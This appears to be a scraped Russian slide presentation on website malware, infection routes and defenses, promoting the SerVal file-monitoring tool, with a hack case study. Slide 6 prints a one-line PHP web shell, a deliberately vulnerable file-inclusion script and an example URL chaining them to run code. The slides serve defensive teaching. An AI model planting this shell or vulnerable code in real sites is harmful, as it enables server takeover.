Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...
 
PHP
PHPPHP
PHP
 
Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...
Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...
Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...
 
Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...
Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...
Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...
 
Переход сайта на Https - инструкция от WebCanape
Переход сайта на Https - инструкция от WebCanapeПереход сайта на Https - инструкция от WebCanape
Переход сайта на Https - инструкция от WebCanape
 
Взломать Нельзя Защитить: как взламывают сайты и как их эффективно защищать
Взломать Нельзя Защитить: как взламывают сайты и как их эффективно защищатьВзломать Нельзя Защитить: как взламывают сайты и как их эффективно защищать
Взломать Нельзя Защитить: как взламывают сайты и как их эффективно защищать
 
Как быть с большими сайтами на Word press
Как быть с большими сайтами на Word pressКак быть с большими сайтами на Word press
Как быть с большими сайтами на Word press
 
Site secure (maxim_lagutin)
Site secure (maxim_lagutin)Site secure (maxim_lagutin)
Site secure (maxim_lagutin)
 
Как обеспечить безопасность клиентских сайтов
Как обеспечить безопасность клиентских сайтовКак обеспечить безопасность клиентских сайтов
Как обеспечить безопасность клиентских сайтов
 
Защищаем WordPress-сайт от хакерских атак
Защищаем WordPress-сайт от хакерских атакЗащищаем WordPress-сайт от хакерских атак
Защищаем WordPress-сайт от хакерских атак
 
Веб-сервер
Веб-серверВеб-сервер
Веб-сервер
 
Безопасность Joomla: теория и практика
Безопасность Joomla: теория и практикаБезопасность Joomla: теория и практика
Безопасность Joomla: теория и практика
 
браузеры презентация
браузеры презентациябраузеры презентация
браузеры презентация
 

SerVal site monitoring presentation - Презентация SerVal

  • 1. Вирусы, трояны, бекдоры на сайтах: пути заражения и варианты защиты Александр Барычев https://www.facebook.com/barychev.alexander alexander@barychev.ru ICQ #143876457 Skype: dimases77
  • 2. Малварь - злонамеренная программа ● Вирус — заражение посетителя, через уязвимости в браузере ● Троян — управление сайтом, организация ботнета ● Спам-скрипт — рассылка спама ● Размещение ссылок — коды SAPE, Linkfeed, каталоги ссылок ● Клоакинг с переадресацией трафика
  • 3. Атакуемые файлы ● .js, .swf — используется для распространения вирусов ● .php, .pl, .cgi — серверные скрипты, через них можно делать все, хоть сервер Пентагона брутить ● .htaccess — установка переадресации (как клоакинг) на другие сайты, чаще всего по User Agent ● .htm, .html — статические ссылочные каталоги, залитые через Webshell
  • 4. Последствия заражения ● Распространение вирусов ● Рассылка спама ● Атака других сайтов ● Пессимизация в поисковых системах ● Блокировка хостинга ● Попадание IP и домена в черные списки Серьезный урон для бизнеса!
  • 5. Варианты заражения ● «Угон» из сохраненных паролей с зараженного компьютера ● Через уязвимость на сайте, чаще всего через форму загрузки файлов на сайт ● Через уязвимость авторизации в Панели управления ● Через многочисленные плагины к популярным CMS ● XSS, SQL-injection, LFI
  • 6. Local File Inclusion avatar.jpg Самый простой WebShell: <?assert(stripslashes($_REQUEST["e"]));?> image.php Скрипт с LFI-инъекцией: <?php // {..} примитивная проверка, которая часто легко обходится if (!isset($_GET['file']) OR !file_exists('./tpl/default/'.$_GET['file'])) die('404 Not Found'); // {..} возможно, проводятся еще какие-то проверки include './tpl/default/'.$_GET['file']; // локальный инклуд файла ?> http://site.com/image.php?file=../../upload/avatar.jpg&e=phpinfo();
  • 7. Крутой WebShell Позволяет: ● Создавать, изменять и удалять любой файл и директорию ● Выполнять произвольный код и команды bash ● Подключаться и управлять БД
  • 8. Опасные функции PHP ● eval() - выполнение произвольного кода ● assert() - выполнение произвольного кода ● exec(), shell_exec(), system() - выполнение команд консоли ● base64_decode() - декодирование обфусцированного кода ● preg_replace() с модификатором e — выполнение произвольного кода (запрещено с 2012 года)
  • 9. Кто под угрозой? ● Пользователи популярных и бесплатных CMS Wordpress, Joomla ● Пользователи популярных и платных CMS ● Любители сохранять пароли в FTP и SCP клиентах, браузерах ● Все, кто использует Apache + PHP ● Любой, у кого есть Вебсервер, который «глядит» в Интернет
  • 10. Так что же делать? ● Обновить все серверное ПО до актуальных версий ● Провести аудит исходного кода скриптов ● Установить все апдейты на CMS, на модули, на плагины ● Запретить доступ к директориям через http в .htaccess, которым это не нужно ● Отслеживать изменения файлов!
  • 12. Как использовать SerVal? ● Скачать с сайта http://www.serval.site ● Установить, запустив инсталляцию, на хостинг в отдельный домен, например, http://serval.moisite.ru, настроить планировщик задач Cron. ● Завести проект — сайт который будет мониторится на изменение файлов ● Получить уникальный PHP-файл сканера для сайта и загрузить его на хостинг ● Обращать внимание на изменения, о которых будет уведомлять система http://www.serval.site
  • 15. Кейс взлома altika.ru 05 мая 2016 примерно в 0 часов ночи были добавлены 3 файла: ● /thumbs.php [25655B] ● /webim/styles/original/images/buttons/mysql.php [28786B] ● /webim/styles/original/images/mail.php [233B] http://www.serval.site
  • 16. Кейс взлома altika.ru Добавлены: ● /xml.php [431B] ● /images/data/inc.php [539B] ● /images/hyundai/general.php [8361B] ● /images/hyundai/test.php [442B] ● /images/hyundai/themes.php [8361B] ● /images/main/config.php [592B] ● и другие (всего 20)... Изменены: ● /chapters/daewoo/config.php [2869B] ● /stats/reports/filters.php [7175B] ● /stats/reports/ip.php [1740B] ● /stats/reports/searchpages.php [7193B] ● /stats/reports/servers.php [2588B] ● и другие (всего 24)... 05 мая 2016 примерно в 5-6 часов утра были http://www.serval.site
  • 17. Все это показал SerVal http://www.serval.site
  • 19. При этом главное: ● Быстро выявить взлом ● Устранить последствия ● Проанализировать и устранить уязвимость Взломать могут каждый сайт! Следите за своими сайтами! http://www.serval.site
  • 20. В этом поможет вот этот милый котик! Скачивайте, устанавливайте, пользуйтесь! http://www.serval.site
  • 21. Александр Барычев https://www.facebook.com/barychev.alexander alexander@barychev.ru ICQ #143876457 Skype: dimases77 СПАСИБО ЗА ВНИМАНИЕ! http://www.serval.site